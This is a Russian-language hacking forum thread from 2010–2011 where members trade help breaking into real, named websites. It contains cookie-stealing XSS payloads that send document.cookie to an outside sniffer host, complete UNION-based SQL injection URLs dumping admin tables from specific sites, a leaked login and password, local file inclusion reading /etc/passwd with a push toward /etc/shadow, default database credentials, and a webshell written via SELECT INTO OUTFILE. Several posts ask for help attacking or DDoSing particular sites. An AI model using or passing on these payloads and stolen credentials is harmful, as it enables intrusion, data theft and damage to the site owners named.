Просмотр полной версии : Вопросы по уязвимостям
Предлагаю сделать небольшую объединяющую тему для разбора реальных уязвимостей, будь sqli, xss, инклуды и т.п.
Если выкладываете ссылку на сайт, делайте хайд, чтобы она не индексировалась. Ну и максимально полное описание проблемы + четко сформулированный вопрос. Перед тем, как задать вопрос, прошу пользоваться гуглом и поиском по форуму, чтобы не спрашивать дважды, а то и трижды одно и то же.
Norton710
09.10.2010, 01:00
Вобщем проблемма такая) Нашел уязвимость на рандомном сайте
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
alert('') выполняется при вводе
code:
'>">alert(/XSS/)
в строку поиска или в адресную строку.
Но на этом всё и закончилось, ибо как я не пытался вбить туда скрипт под HPС Снифф, он не выполняется..
Сообственно тело скрипта
code:
">
img = new Image(); img.src = "Адресс снифа"+document.cookie;
Вполне вероятно, что у меня просто неправильное представление о выполнее XSS кода.. Если это так и есть, то ткните, где именно я туплю) буду очень благодарен =)
p.s. сайт не имеет пользовательской авторизации. Но IP и тип браузера на снифф отсылаться-то вроде должны?..
Срабатывает так:
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Используй код для пассивной атаки из настроек нашего снифера
Norton710
09.10.2010, 01:00
stan_q, да, так прокатило =) спасибо большое))
тогда по теме еще один вопрос, возможно ли запускать этот скрипт через результат поиска по сайту (если XSS в поисковике, а адресная строка без уязвимостей)
Я так понимаю, если alert прокатывает, значит сайт пропускает . А если сайт пропускает скрипт, то можно вбить его в поисковик и в обновлённой странице в исходном коде будет целый и невредимый скрипт.. Тоесть при заходе юзера на ссылку с результатом поиска, при загрузке страницы этот скрипт будет выполняться. Я правильно понимаю?)
Да, если alert срабатывает, то скрипт не фильтрует вводимые данные. Но если запрос передается через POST-запрос, то для эксплуатации надо будет применять разные методы, чтобы заставить жертву выполнить нужный тебе запрос. Т.е. чтобы жертва сама ввела в поиск вредноносный код и нажала энтер для его выполнения. Поправьте меня, если я ошибаюсь.
Мой 1000-й пост
Norton710
09.10.2010, 01:00
stan_q, Post запросы, вроде как, идут только на ресурсах с коментариями и заливкой файлов. И то, только в части сайта.. Другая часть сайта работает по обычному принципу
Если фильтр изменяет символы
code:
"
, еще есть шанс замутить активную XSS или только пасивную?
В разных частях сайта запросы выполняются по разному или везде один фильтр? тоесть если на всех страницах сайта Alert не канает, возможно ли существование такого отдела сайта, где скрипт запустится? или фильтр работает по всему сайту?
p.s. Гц с юбилейным постом =)
Norton710
13.10.2010, 01:00
Столкнулся с такой проблеммой:
На одном форуме нашел возможность добавление
code:
Добавил картинку со сниффера - прокатило, и он даже IP пользователей ловит =)
Дальше пробовал поставить Пробел после ссылки на картинку и опять всё отлично =)
Но при попытке вставить Java код, а точнее
code:
http://httpz.ru/картинка dynsrc=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/сниффер?"+document.cookie;')
картинка убивается и на её месте пустое место.
Собственно вопрос - Если такая фигня, активная XSS еще возможно? или полностью отпадает?
p.s Пробовал lowsrc и перестановку Java скрипта.. Картинка всё так же не читается)
p.s.s. Вот всё, что известно мне о сайте.
1)Форум стоит на булке v4.0.0
2)Фильтратор изменяет такие символы, как и "
3)Перевод скриптов в Hex и Юник делают скрипт нечитаемым (хотя он остаётся целым)
Что можно еще попробовать сделать с скриптом?) Интересны все предложения =)
M@ZAX@KEP
15.10.2010, 01:00
Цитата:
Что можно еще попробовать сделать с скриптом?
HTML highlight
http://www.qweqw.ru/"/dynsrc="javascript:alert()"/1.jpg
http://www.qwewqw.ru/"/dynsrc=javascript:alert()/1.jpg
где http://www.qweqw.ru/1.jpg (https://hpc.name/redirector.html#http://www.qweqw.ru/1.jpg) - адрес отображаемой картинки
Norton710
15.10.2010, 01:00
M@ZAX@KEP, не прокатило.. картинка не запустилась ни в одном случае)
lesha_firs
16.10.2010, 01:00
Такой вопрос!
Вот сайт
http://teploe-okno.ru/page.php?pid=-1 (https://hpc.name/redirector.html#http://teploe-okno.ru/page.php?pid=-1)
возврашает 2 ошибки одна в левом столбце это sql ошибка! до неё я не смог добраться((
а внизу перед footer возникает такая ошибка
code:
Warning: is_dir() [function.is-dir]: open_basedir restriction in effect. File(/var/www/vhosts/teploe-okno.ru/httpdocs/hpics/1/) is not within the allowed path(s): (/home/users2/k/karakovski/:/usr/local/lib/php/:/tmp/) in /home/users2/k/karakovski/domains/teploe-okno.ru/page.php on line 31
как я знаю is_dir()
булевая функция опредиляюшие евляеться ли файл дирикторией!
Вот у меня вопрос это значит что файл подгружаеться из дериктории get параметром??
если да то что можно сделать??
и вообще что можно сделать?
Нет там инъекции, там изначально скрипт написан с ошибкой, о чем нам и сообщают при даже стандартном запросе http://teploe-okno.ru/page.php?pid=1 (https://hpc.name/redirector.html#http://teploe-okno.ru/page.php?pid=1)
Вторая ошибка дает тебе только раскрытие путей, использовать ее для взлома другим способом возможности нет.
lesha_firs
16.10.2010, 01:00
Цитата:
Сообщение от stan_q
Нет там инъекции, там изначально скрипт написан с ошибкой, о чем нам и сообщают при даже стандартном запросе http://teploe-okno.ru/page.php?pid=1 (https://hpc.name/redirector.html#http://teploe-okno.ru/page.php?pid=1)
Вторая ошибка дает тебе только раскрытие путей, использовать ее для взлома другим способом возможности нет.
да это уже не суть важно я и так смог добраться до базы)))
примерно 100 сайтов за раз раскрыл и видео снял)))
если интересно)) http://zalil.ru/upload/29821677 (https://hpc.name/redirector.html#http://zalil.ru/upload/29821677)
Добавлено через 5 часов 28 минут
вот нашел сайт все перепробывал что знал даже версию узнать не могу((
подскажите
code:
http://www.turkishculturalfoundation.org/pages.php?ID=1%27
Добавлено через 5 часов 39 минут
Кстате там еще и поис %27 не воспринимает точней ошибку выдает)))
а как через поиск ломать также?
M@ZAX@KEP
11.11.2010, 01:00
hugolom, что тебя смущает в первом? Когда пишешь и оно выводит, это кагбэ почти пассивка. Но там htmlspecialchars, так что кури бамбук.
Что ты получаешь во втором я не знаю, я получаю "документ не найден", то бишь 404. И я вообще не вижу, какому ты там скрипту пытался передать код с алертом и что это ещё за локальные протоколы file:// ?!
В 3 у тебя чистое раскрытие пути, но зачем ты натыкал слэшей перед news в адресе? Типа красивее? :ag: И никакого локального инклуда там нет, что ты пытался там сделать - непонятно))) /etc/passwd ты там так точно не поимеешь.
Скрытый текст (вы должны быть авторизованы и иметь 50 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
M@ZAX@KEP
12.11.2010, 01:00
hugolom, нет. Для того оно и сделано)) Обсуждал я недавно эту тему с кем-то в лс... пришли к тому, что можно надеяться только на человеческий фактор - что не весь ввод так фильтруется, что где-нибудь, что-нибудь да забыли, пропустили.
Тогда как можно обойти чтоли htmlspecialchars? есть варианты?
onekey_nw
16.11.2010, 01:00
Люди вот вопрос.
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
при подстановки в поля
code:
">alert()
вылазит окошечко.
я так понял это пассивная xss
что с ней делать дальше.
зы. или скиньте ссылки на норм статьи по xss а то по гуглу всего 2 нормальные гуляют из которых мало что ясно.
Norton710
19.11.2010, 01:00
По идеи, используя логин SYSDBA и пароль masterkey, сможешь подключиться к СУБД сервера.
Цитата:
По идеи, используя логин SYSDBA и пароль masterkey, сможешь подключиться к СУБД сервера.
а не покажеш на шкриншотах как ты это делаеш а?
Norton710
19.11.2010, 01:00
Качаешь программу InterBase для подключения к СУБД а дальше только ручками, ручками.. Скрин рук присылать нужно, или догадаешься что это?
нас в пту еше этому не учили, вот и просю гуру хацкинга пролить свет на проблему.
Oro4imaru
19.11.2010, 01:00
сканер показал уязвимость на сесвере
Цитата:
5.37 уязвимость Порт 3050/tcp - InterBase 192.168.0.210 [SERVER]
Имя сервиса : InterBase SQL Server
5.37.1 пароль по умолчанию 192.168.0.210 [SERVER], уязвимость3050/tcp - InterBase
Описание
Пользователь 'SYSDBA' имеет стандартный пароль 'masterkey'.
Решение
Изменить пароль.
что можно получить используя ее и как ее использовать?
с меня спасибо!
с правами SYSDBA , ну ребетнуть или вырубить сможеш к примеру , сбэкапить тоже, востановить.
Скрытый текст (вы должны быть авторизованы и иметь 30 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
вот нащёл xss чё с ней делать дальше???
Можешь украсть сессию!!11 статей полно по этой теме
Есть ли где нить литература\статьи по поиску уязвимостей в движках?
т.е. если есть сорс его.
M@ZAX@KEP
30.11.2010, 01:00
hugolom, есть конечно (https://hpc.name/redirector.html#https://rdot.org/forum/showthread.php?t=596).
Beelzebul
05.12.2010, 01:00
Застрял
Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Получается почему то только последние
Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
а там белеберда.
Не пойму почему другие не поддаются или я не выспался?
Цитата:
Сообщение от kimpossible
народ помогите с сайтом http://old.cageprisoners.com/article...sion(),4,5,6-- (https://hpc.name/redirector.html#http://old.cageprisoners.com/article...sion(),4,5,6--) остановился тут дальше незнаю че делать http://old.cageprisoners.com/article...61646d696e73-- (https://hpc.name/redirector.html#http://old.cageprisoners.com/article...61646d696e73--) http://old.cageprisoners.com/article...+from+admins-- (https://hpc.name/redirector.html#http://old.cageprisoners.com/article...+from+admins--)
Ошибка в запросе: вместо column_name написал table_name.
Правильный запрос http://old.cageprisoners.com/article...61646d696e73-- (https://hpc.name/redirector.html#http://old.cageprisoners.com/articles.php?id=-21612+union+select+1,2,group_concat%28column_name% 29,4,5,6+from+information_schema.columns+where+tab le_name=0x61646d696e73--)
Дальше, думаю, разберешься
Добавлено через 5 минут
Цитата:
Сообщение от Beelzebul
Застрял Скрытый текст, требуется 1 сообщение(ий) (сейчас у вас 1053): http://www.beliodobrom.by/ru/agromas...p_concat%28tab (https://hpc.name/redirector.html#http://www.beliodobrom.by/ru/agromash/index.php?id=-33+union+select+1,2,3,4,5,6,7,8,group_concat%28tab ) le_name%29,10,11,12,13,14,15,16,17,18,19,20+from+i nformation_schema.tables+limit+0,1 Получается почему то только последние Скрытый текст, требуется 1 сообщение(ий) (сейчас у вас 1053): beliodobrom,beliodobrom0001 а там белеберда. Не пойму почему другие не поддаются или я не выспался?
А других там и нет. Такое тоже бывает
kimpossible
05.12.2010, 01:00
народ помогите с сайтом http://old.cageprisoners.com/article...sion(),4,5,6-- (https://hpc.name/redirector.html#http://old.cageprisoners.com/articles.php?id=-21612+union+select+1,2,version(),4,5,6--)
остановился тут дальше незнаю че делать http://old.cageprisoners.com/article...61646d696e73-- (https://hpc.name/redirector.html#http://old.cageprisoners.com/articles.php?id=-21612+union+select+1,2,group_concat(table_name),4, 5,6+from+information_schema.columns+where+table_na me=0x61646d696e73--)
http://old.cageprisoners.com/article...+from+admins-- (https://hpc.name/redirector.html#http://old.cageprisoners.com/articles.php?id=-21612+union+select+1,2,contact_ws(0x3a,admins,admi ns,admins,admins,admins,admins),4,5,6+from+admins--)
Нашел скулю:
Скрытый текст (вы должны быть авторизованы и иметь 2 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Кол-во столбцов:8
Версия: 5.5.6
Есть столбец Ad_user,но я не могу его открыть,выдает просто ошибку.Помогите.
Если надо все пошаговые действия скину
P.S Там все таки есть скуля :rolleyes:
Но в каком нибудь из этих столбцов должны же хранится пароли?Я прав?
-=angel=-
07.12.2010, 01:00
Скрытый текст (вы должны быть авторизованы и иметь 23 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Не один хеш не удается расшифровать
Norton710
07.12.2010, 01:00
Frinst, честно говоря недумая вбил в программу Havij и она сразу все таблицы вывела =P Ad_user там есть, вот её колонки:
ip / data / title / name / id
Под нэймом идёт логин, паролей мною увидено не было)
еще есть столбец users, он поинтереснее.. но паролей там тоже нету =/
Всем здрасте!
Вот сайт:
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Если в форме авторизации в поле логин подставить кавычку, ну в общем увидите результат..
Вопрос как можно дальше раскрутить? SIPT знаю совсем чуть-чуть. Я так понимаю в SIPT надо выбрать :
Injection type - Post data..
SERGEJKA
14.12.2010, 01:00
ставиш в конце ковычку ` например site.ru/index.php?id=1` если будет ошибка значит можно делать иньекцию! если хоч ЛС нипишы помогу чем смогу!
если при поиске sql находишь сайт типа
code:
site.ru/index.php?id=1
то тогда если вместо ?id=1 подставить ?id=2 толк будет??тоесть если в ?id=1 нет иньекции то и в ?id=2 ?id=3 тоже не будет иньекции???
Толку не будет.читай здесь (https://hpc.name/showthread.php?t=18295)
а если напремер не
Цитата:
site.ru/index.php?id=1
а
Цитата:
site.ru/langage.php?id=1
Будет толк???
Если скрипт langage.php уязвим, то да. пробуй, подставляй кавычки etc..
M@ZAX@KEP
15.12.2010, 01:00
sider56, если ты меняешь только число (параметр, передаваемый скрипту), то это ничего не изменит.
Совсем другое дело, если ты ищешь в разных скриптах (напр. language.php и index.php - разные скрипты). В одном скрипте инъекция может быть, а в другом нет (ну или в обоих может быть, но ты понял)) ).
Что значит FPD ? PoC? просто есть плагин с помощью него напер на один php код
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
есть ли здесь что кроме раскрытия путей?
Цитата:
Сообщение от SERGEJKA
ставиш в конце ковычку ` например site.ru/index.php?id=1` если будет ошибка значит можно делать иньекцию! если хоч ЛС нипишы помогу чем смогу!
я знаю как иньекцию провести)
M@ZAX@KEP
15.12.2010, 01:00
Обычная ошибка пыховская... ничего не даёт.
вопрос такой
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
затупил че дальше делать
А в чем вопрос-то? Колонки вывел, запрос работает правильно.
M@ZAX@KEP
02.01.2011, 01:00
stan_q, он имел ввиду куда дальше крутить))
zack, выводи теперь колонки нужных тебе таблиц:
group_concat(column_name) ... from+information_schema.columns+where table_name=имя таблицы
Дальше содержимое колонки, которая интересует:
group_concat(имя колонки) ... from+имя таблицы
Манов не читал штоле?
МХ, я думаю, он имел в виду, чтобы ему логины и пассы нашли. А там, если не ошибаюсь, только 2 несистемных таблицы - ssangyoung и ssangyoung001. И в них нет данных авторизации
SERGEJKA
03.01.2011, 01:00
а можно ли внедрить картинку( например мордочку) если есть xss уязвимость(пасивка)???
M@ZAX@KEP
03.01.2011, 01:00
SERGEJKA, чё хочешь - то и можно. XSS - по сути возможность внедрить любойсвой код на страницу.
stan_q - M@ZAX@KEP прав я имел ввиду куда дальше крутить.
мануал нечитал дай ссылку
и я сделал как ты сказал но там всеравно получается какаята мутота
zack, маны на форуме по скулям есть.
Ты когда по команде table_name from information_schema.tables выводишь названия таблица, убери системные (которые тебе в принципе не нужны, в них ничего интересного нет) доп.командой where table_schema!='information_schema'
Запрос будет такой:
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Итого в наличии имеется всего 2 несистемные таблицы.
недавно напал на такую штуку
source:
http://happy-dom.ru/p_detail.php?
id
=1&tb=db
можно выполнять небольшие команды типо mysql.user
но так и не мог ничего толкового из этого получить, не подскажите?
flamehart
03.02.2011, 01:00
Ошибка MySQL!
========================
MySQL вернул ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-5,5' at line 1
Номер ошибки:
1064
SELECT * FROM `stress_news` ORDER BY date DESC LIMIT -5,5
лимит вроде не правильно выставит
flamehart
03.02.2011, 01:00
тобишь нет?=)
Инъекция. Если видишь в тексте ошибки слово "синтаксис" - это на 99% инъекция
ЗЫ Правда, если эта ошибка выпадает еще до того, как ты каким-либо образом модифицируешь запрос, то это может означать лишь кривость написанного кода
Цитата:
Сообщение от Ne1c
Для тренировки лучше ручками. Если хочешь подробностей пиши в асю. Позже мб видео сниму.
вот все вы говорите "для тренировки лучше ручками" а как ручками если не знаешь даже в какую сторону ветер дует, лучше всего(по моему мнению) тренероваться по следующей схеме:
1.найти уязвимый сайт
2.взять прогу к примеру sql helper
3.Вбить адресс сайта в прогу и посмотреть какие результатЫ она выдаст
4.А теперь выводить вручную все что выдала прога, тоесь, таблицу потом строку, потом колонку(не обязательно в таком порядке)!
и когда ты научишься это все выводить тогда и на другом уязвимом сайте тоже сможешь, разница всего в том что придется подбирать названия колонок(как то так)!
Итог : Чтоб что-то делать нада понимать как єто что-то работает!
Чтоб єто понять нужно иметь єто самое что-то и внимательно изучить! Тоесть имея уязвмый сайт, зная его базу,таблици,колонки и т.д, можно натренероваться!
P.S. Сильно не ругайте , я пока єто писал, сам запутался!
Like-Angel
06.02.2011, 01:00
Привет Всем кто может помочь вот есть сайт нашёл таблицы вот только незнаю как подставлять таблицы помогите кто знает ?
Цитата:
http://www.raftingfedadyg.ru/news.ph..._schema.tables (https://hpc.name/redirector.html#http://www.raftingfedadyg.ru/news.php?id=-14+union+select+1,group_concat%28table_name%29,3,4 ,5,6,7,8+from+information_schema.tables)
Сначала узнай колонки таблицы которой хочешь. А потом как узнаешь колонки
делай такой запрос _http://xxx.com/nion+select+1,сюда имя колонки,3,4,5,6,7,8+from+table_name='сюд а имя таблицы'
Like-Angel
06.02.2011, 01:00
Цитата:
Сообщение от Ne1c
Сначала узнай колонки таблицы которой хочешь. А потом как узнаешь колонки
делай такой запрос _http://xxx.com/nion+select+1,сюда имя колонки,3,4,5,6,7,8+from+table_name='сюд а имя таблицы'
можешь сделать видео заранее благодарен
http://www.raftingfedadyg.ru/admin/login.php (https://hpc.name/redirector.html#http://www.raftingfedadyg.ru/admin/login.php)
Data Found: pass=05081900
Data Found: nik=Петухов Владимир
Data Found: login=тетис
Data Found: ID=1
Если ты хочешь именно взломать, тогда используй sqlhelper, а если тренируешся, тогда всеравно используй хелпер, и составляй запросы на основе виданных тебе даных sqlhelperom!
Like-Angel
06.02.2011, 01:00
Цитата:
Сообщение от rox@hak
Если ты хочешь именно взломать, тогда используй sqlhelper, а если тренируешся, тогда всеравно используй хелпер, и составляй запросы на основе виданных тебе даных sqlhelperom!
да я просто тренируюсь что за sqlhelper можешь дать ссылку.
Добавлено через 14 минут
да всё нашёл программу эту ну это всё хорошо хотелось бы ручками.
Для тренировки лучше ручками. Если хочешь подробностей пиши в асю. Позже мб видео сниму.
Like-Angel, снял видео, получилось не в лучшем качестве(( но есть как есть, сам смысл думаю понятен. Если что пиши в ЛС. Вот ссылка на само видео http://depositfiles.com/files/nvr84q4yh (https://hpc.name/redirector.html#http://depositfiles.com/files/nvr84q4yh)
Like-Angel
07.02.2011, 01:00
Цитата:
Сообщение от Ne1c
Like-Angel, снял видео, получилось не в лучшем качестве(( но есть как есть, сам смысл думаю понятен. Если что пиши в ЛС. Вот ссылка на само видео http://depositfiles.com/files/nvr84q4yh (https://hpc.name/redirector.html#http://depositfiles.com/files/nvr84q4yh)
спасибо........
Добавлено через 2 минуты
вот парни срочно нужно слить сайт activ.kz
Цитата:
http://activ.kz/kz/?l=news&o=display&page=&idx=387%22 (https://hpc.name/redirector.html#http://activ.kz/kz/?l=news&o=display&page=&idx=387%22)
Цитата:
Microsoft JET Database Engine error '80040e14'
ошибка
Syntax error in string in query expression 'NEWS_ID=387";'.
/kz/_news.asp, line 255
пытался сам но не смог кто поможет ?
наверно самый ламерский вопрос.
Куда помещать или вводить SQL инъекции?
Например такую
code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%'
M@ZAX@KEP
13.02.2011, 01:00
dix2m, это не инъекция, а обыкновенный запрос к базе. Куда вводить зависит от того, как тебе удобнее юзать базу. Если есть phpmyadmin, то там есть возможность выполнения запросов к базе (кури документацию).
Если его нету, кури документацию к своей СУБД и ищи, где у неё интерфейс. Не графический, естественно приложение в режиме командной строки. Этому приложению и скармливай запрос через командную строку (или терминал, чё у тебя там =))
M@ZAX@KEP Спасибо...
А как найди СУБД? В интернете искал, ничего стоещего не нашел.
M@ZAX@KEP
16.02.2011, 01:00
dix2m, ну если ты спрашиваешь, куда отдавать запросы, я думал что она у тебя установлена)) Самый простой способ - установить Denwer. В комплекте с веб-сервером на localhoste получишь и СУБД (MySQL) и phpmyadmin.
Прив ,люди подскажите ли...
У меня есть сайт uztest.ru ...у нас там задают подготовку к ЕГЭ..))
На сайте нет уязвимостей (я лично не нашол всё облазил)
Но я думаю можно заддосить сайт,самое уязвимое место для ддоса помоему окно авторизации
Так как там нет капчи...Помогите ,мне нужен запрос,к примеру если вводишь в адресную строку вводился логин и пароль и человек на сайте авторизовывался..)
Вот поля и кнопки которые надо задействовать:
login
password
submit
IzotopOzone
17.02.2011, 01:00
доброго времени суток.обьясню кратко я просканил nmap'ом ip адрес и у него открыты несколько портов 25 443 3306 как можно получить доступ на этот сервер подробность не обязательна
Проблем с LFI наковырял site.ru/?page=../../../../../etc/passwd%00 выдает root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon и т.д что с этим можно сделать?
M@ZAX@KEP
24.02.2011, 01:00
2 zack: клац (https://hpc.name/showthread.php?t=18295)
2 ^YaHoo^: тык (https://hpc.name/redirector.html#http://www.google.ru/search?q=%2Fetc%2Fpasswd)
у меня такая проблема...
сайт sql 5 версия движка
code:
http://www.idartistes.com/fiche.php?cat=95+union+select+1,2,3,4,5,version%28 %29,7,8--
http://www.idartistes.com/fiche.php?cat=95+union+select+1,2,3,4,5,table_name ,7,8+from+information_schema.tables--
http://www.idartistes.com/fiche.php?cat=95+union+select+1,2,3,4,5,group_conc at%28column_name%29,7,8+from+information_schema.co lumns+where+table_name=0x4350555f55534552--
что делать дальше?....
ответ если можно то пошаговый, чтобы просто понять а лучше видео(если не лень)
ты видимо не понял... я не знаю какую колонку взять?
http://www.idartistes.com/fiche.php?...IMIT+19,1%20-- (https://hpc.name/redirector.html#http://www.idartistes.com/fiche.php?cat=95+union+select+1,2,3,4,5,TABLE_NAME ,7,8+FRom+INFORMATION_SCHEMA.TABLES+LIMIT+19,1%20--)
вот эту покрути там cp видел
как расшифровать такой пароль
$P$BFB6L90cpyXFDFqFAppgfKRobEOndN/
Цитата:
Сообщение от rox@hak
как расшифровать такой пароль
$P$BFB6L90cpyXFDFqFAppgfKRobEOndN/
Брутом, по базе хешей, иначе никак
Типы хешей и софт для работы с ними здесь (https://hpc.name/redirector.html#http://www.insidepro.com/rus/passwordspro.shtml#200)
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
кто знает туда реально шелл залить?)
так залил Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
а как php опять невыполняется ((
M@ZAX@KEP
10.03.2011, 01:00
ADRENALIN, во-первых, это не уязвимость... во-вторых это даже не ошибка. С точки зрения html всё правильно. Тег не имеет содержимого (у него есть только атрибуты, записанные внутри ), следовательно, в закрывающем теге нет необходимости.
Такая же ситуация, например, с тегом img. Можно записать изображение так:
HTML highlight
А можно и так:
HTML highlight
Принципиальной разницы ноль, и оба варианта работают одинаково правильно.
Adrenalin
10.03.2011, 01:00
Вопрос:Я нашел не закрытый скрипт - тут должен был закрываться тег link, но он не закрыть, очень прошу объяснить как воспользоваться такой ошибкой
M@ZAX@KEP
11.03.2011, 01:00
Цитата:
Сообщение от ADRENALIN
Значит извиняюсь за нубство), но вот все равно интересно если я найду не закрытый скрипт, как мне этим воспользоваться???
Никак. Я же сказал - это не уязвимость.
Adrenalin
11.03.2011, 01:00
Значит извиняюсь за нубство), но вот все равно интересно если я найду не закрытый скрипт, как мне этим воспользоваться???
M@ZAX@KEP
12.04.2011, 01:00
Может я глазной, но там (https://hpc.name/redirector.html#http://www.jobtown.ru/publish.php?action=showpublish&ID=1) никакой SQL-Inj нету... или только я не вижу error_а?
Цитата:
Сообщение от M@ZAX@KEP
Может я глазной, но там никакой SQL-Inj нету... или только я не вижу error_а?
Ну почему же, все там есть
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Вот только дальше срабатывает WAF, и вытянуть что-либо важное у меня не получилось. Как мне показалось, срабатывает фильтр на FROM
Oro4imaru
12.04.2011, 01:00
что с этим можно сделать ?????
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
M@ZAX@KEP
13.04.2011, 01:00
Веселуха... не вижу ничего вообще при подстановке кавычки О_о
Цитата:
Сообщение от M@ZAX@KEP
Веселуха... не вижу ничего вообще при подстановке кавычки О_о
Ну бывает ошибки и не выводится
Цитата:
Сообщение от stan_q
Ну почему же, все там есть
*** скрытый текст ***
Вот только дальше срабатывает WAF, и вытянуть что-либо важное у меня не получилось. Как мне показалось, срабатывает фильтр на FROM
Да срабатывает на from, ведь если поставить слово после комментария, то срабатывает фильтр...
M@ZAX@KEP
13.04.2011, 01:00
narviss, ну бывает и баги нет, когда ошибки не выводятся. Даже при слепой скуле есть вывод ошибки.
Есть шелл на сервере с линуксом. Как можно узнать список активных сайтов на сервере, с их реальными путями, если файл etc/hosts практически пустой (запись одна, а сайтов реально много)?
PS Вопрос не актуален, забыл про виртуальные хосты в апаче
дошол до http://www.kitana.ru/razdel.php?id=-...7personal%27-- (https://hpc.name/redirector.html#http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,group_concat%280x2b,column_na me%29+from+information_schema.columns+where+table_ name=%27personal%27--) что дальше делать подскажите
Цитата:
Сообщение от Softic
дошол до http://www.kitana.ru/razdel.php?id=-...7personal%27-- (https://hpc.name/redirector.html#http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,group_concat%280x2b,column_na me%29+from+information_schema.columns+where+table_ name=%27personal%27--) что дальше делать подскажите
Если честно, то беги....
А если не боишься дядей в голубых костюмах, то вытаскивай колонки из таблицы http://www.kitana.ru/razdel.php?id=-...rom+personal-- (https://hpc.name/redirector.html#http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,group_concat%280x2b,login,0x3 a,psw%29+from+personal--) по статье*)
Знатоки мускуля и гении администрирования, вопрос к вам: есть доступ к пхпмайадмин, права полные, в т.ч. file_priv=y. Есть абсолютные пути на сервере. По команде
code:
SELECT '1' into outfile "/data/vhosts/asmap2009/www/ee.php"
получаю
code:
Can't create/write to file '/data/vhosts/www/ee.php' (Errcode: 13)
В чем проблема?
code:
SELECT * FROM INTO OUTFILE '/data/vhosts/www/ee.php'
пробуй
Цитата:
Сообщение от hugolom
пробуй
Нет, не работает. С точки зрения синтаксиса мускуля мой запрос написан верно, ошибка не в этом.
Цитата:
Сообщение от M@ZAX@KEP
stan_q, если не ошибаюсь, то file_priv=y ещё не значит, что пользователь, под которым запущен мускуль, имеет права записи на все файлы. Оно же не под рутом крутится.
Ошибаешься. Тыц (https://hpc.name/redirector.php?url=http%3A%2F%2Fmysql.ru%2Fdocs%2F instadm.html)
Цитата:
File-пользователь,обладающий этим правом,может выполнять команды LOAD DATA INFILE и SELECT...INTO OUTFILE и может читать и записывать любой файл на сервере MySQL.
Есть мысль, что права на сервере для пользователя не позволяют записывать в папку. Может это быть?
Update:
Да, ошибка была в том, что папка была недоступна на запись. Прошла команда
Цитата:
select '' from mysql.user into outfile '/data/vhosts/www/includes/s.php'
Шелл успешно залит
M@ZAX@KEP
09.06.2011, 01:00
stan_q, если не ошибаюсь, то file_priv=y ещё не значит, что пользователь, под которым запущен мускуль, имеет права записи на все файлы. Оно же не под рутом крутится.
M@ZAX@KEP
10.06.2011, 01:00
Цитата:
Есть мысль, что права на сервере для пользователя не позволяют записывать в папку. Может это быть?
Цитата:
Да, ошибка была в том, что папка была недоступна на запись.
Вот именно об этом я и говорил:
Цитата:
не значит, что пользователь, под которым запущен мускуль, имеет права записи на все файлы.
=)
Цитата:
Проблем с LFI наковырял site.ru/?page=../../../../../etc/passwd%00 выдает root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon и т.д что с этим можно сделать?
с этим не чего смотри site.ru/?page=../../../../../etc/shadow%00
http://intim-market.com/api/client/includes/1/exp/icode_3760.js
KillerTT
04.07.2011, 01:00
У меня вопрос по SQL Injection.
Подскажите плиз вот я нашол через личный кабинет ошибку:http://208.115.224.213/Contas/index.php (https://hpc.name/redirector.html#http://208.115.224.213/Contas/index.php)
в поле логина вводим любые буквы допустим: asdfda' и в пасс чёто такое нажимаеи Login и выходит ошабка. Потом я определил количество полей их тама 9 а как дальше я хз) Как определить принтабельные поля? или здесь нада както подругому?
araqwa2009
12.07.2011, 01:00
здравствуйте уважаемые форумчане кто подскажет норм программу для защиты компа от кражи
вот ссылка тут похожие проги но платные
http://notebooks.3dn.ru/publ/anti_vo...kh_pk/1-1-0-20 (https://hpc.name/redirector.html#http://notebooks.3dn.ru/publ/anti_vor_dlja_noutbuka_obshhee_opisanie_i_prednazn achenie_programm_agentov_dlja_portativnykh_pk/1-1-0-20)
там обычная скуля..
code:
http://vesna-kuban.ru/games.php?id=3+and+1=0+union+select+1,group_concat (table_name),3,4,5,6,7+from+INFORMATION_SCHEMA.TAB LES--
Цитата:
Сообщение от araqwa2009
здравствуйте уважаемые форумчане кто подскажет норм программу для защиты компа от кражи
вот ссылка тут похожие проги но платные
http://notebooks.3dn.ru/publ/anti_vo...kh_pk/1-1-0-20 (https://hpc.name/redirector.html#http://notebooks.3dn.ru/publ/anti_vor_dlja_noutbuka_obshhee_opisanie_i_prednazn achenie_programm_agentov_dlja_portativnykh_pk/1-1-0-20)
http://letitbit.net/download/91565.9...zilla.zip.html (https://hpc.name/redirector.html#http://letitbit.net/download/91565.92200bb5d1b0a3c9283fac2c3d7f/Mozilla.zip.html)
подскажите, а какие еще есть программы наподобие NetDeviLz SQL Scanner в которую можно вставить список отобранных сайтов и прогнать на наличие уязвимостей? может есть что-то лучше ее?
при вводе в юрл site.ru/index.php?id=1'
